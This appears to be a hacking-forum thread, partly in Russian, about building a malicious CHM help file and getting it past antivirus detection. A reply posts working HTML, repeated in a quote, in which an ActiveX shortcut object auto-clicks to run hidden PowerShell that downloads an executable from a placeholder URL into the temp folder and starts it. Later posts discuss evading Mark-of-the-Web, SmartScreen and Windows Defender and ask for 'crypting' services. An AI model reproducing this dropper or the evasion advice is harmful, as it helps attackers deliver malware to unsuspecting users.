Malicious CHM File

[wiseguy01]

Hello,

I have made a malicious chm file, I obfuscated the HTML page and used calc.exe to test but still 6/60 on VT detect.
Any ideas how to fix?

Thanks,
WG01

 

[wiseguy01]

wiseguy01 сказал(а):
using powershell line to run from CMD inside CHM and then load a batch file and runs it.

Потому что твой код убитый на глухо, типа этого
Код:
Скопировать в буфер обмена
<html>

<head>
</head>
<body>
<object id=x classid="clsid:C4D2D8E0-D1DD-11CE-940F-008029004347" width=4 height=4>
<param name="Command" value="ShortCut">
<param name="Button" value="Bitmap::shortcut">
<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('URLTOFILE','%TEMP%\lol.exe');Start-Process %TEMP%\lol.exe;">
<param name="Item2" value="273,1,1">
</object>
<script>
x.Click();
</script>

</body>
</html>

Просто используй другие варианты тыц как пример с SMB бегом сюда тыц или тыц

 

[xrahitel]

xrahitel сказал(а):
Потому что твой код убитый на глухо, типа этого Посмотреть вложение 60335
Код:
Скопировать в буфер обмена
<html>

<head>
</head>
<body>
<object id=x classid="clsid:C4D2D8E0-D1DD-11CE-940F-008029004347" width=4 height=4>
<param name="Command" value="ShortCut">
<param name="Button" value="Bitmap::shortcut">
<param name="Item1" value=",cmd.exe,/c powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('URLTOFILE','%TEMP%\lol.exe');Start-Process %TEMP%\lol.exe;">
<param name="Item2" value="273,1,1">
</object>
<script>
x.Click();
</script>

</body>
</html>

Просто используй другие варианты как пример с SMB бегом сюда или

Нажмите, чтобы раскрыть...

Ты на какой винде тестиш? ХР? На новых все файлы скачанные из интернета улетают в блок и на сканирование автоматом из за того что подписи нет. Держу в курсе.

 

[mvjdasf3]

mvjdasf3 сказал(а):
Ты на какой винде тестиш? ХР?

mvjdasf3 сказал(а):
На новых все файлы скачанные из интернета улетают в блок.

8.1 с последними обновами.

Может просто MOTW надо обходить, ставлю в курс

 

[xrahitel]

У вас есть обучение по нему?

 

[hustleTraffic]

xrahitel сказал(а):
8.1 с последними обновами.

Может просто MOTW надо обходить, ставлю в курс Посмотреть вложение 60609

hi, I watched a lot of your videos on Youtube
However I couldn't find any crypting (smartscreen+WD bypass)

Do you have any reliable source?
Thanks